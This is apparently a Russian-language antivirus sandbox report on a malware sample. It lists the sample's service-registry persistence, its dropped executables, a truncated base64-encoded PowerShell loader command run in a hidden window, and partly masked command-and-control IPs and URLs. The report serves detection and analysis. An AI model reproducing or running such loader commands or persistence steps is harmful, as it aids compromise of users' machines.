Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\NlsData001a] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData001a] 'ImagePath' = '"<SYSTEM32>\kbd106n\NlsData001a.exe"'
- 'NlsData001a' "<SYSTEM32>\kbd106n\NlsData001a.exe"
- 'NlsData001a' <SYSTEM32>\kbd106n\NlsData001a.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQADMAZAA4ADQAbgBpAD0AKAAnAFUAJwArACgAJwBmACcAKwAnADAAbQB3ACcAKwAnAHIAbAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABFAG0AcABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\sks2c17.exe
- <SYSTEM32>\kbd106n\nlsdata001a.exe
- %TEMP%\word\2019\sks2c17.exe в <SYSTEM32>\kbd106n\nlsdata001a.exe
- '67.##.210.95':80
- '16#.#41.242.173':8080
- http://ab#####dbelow.com.au/cgi-bin/Lbi20Tu/
- http://16#.###.242.173:8080/QBhg/t4RM1npT5tl5cZCXL/lPXgQxUKQR/ via 16#.#41.242.173
- DNS ASK ab#####dbelow.com.au
- '%TEMP%\word\2019\sks2c17.exe'
- '<SYSTEM32>\kbd106n\nlsdata001a.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQADMAZAA4ADQAbgBpAD0AKAAnAFUAJwArACgAJwBmACcAKwAnADAAbQB3ACcAKwAnAHIAbAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABFAG0AcABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)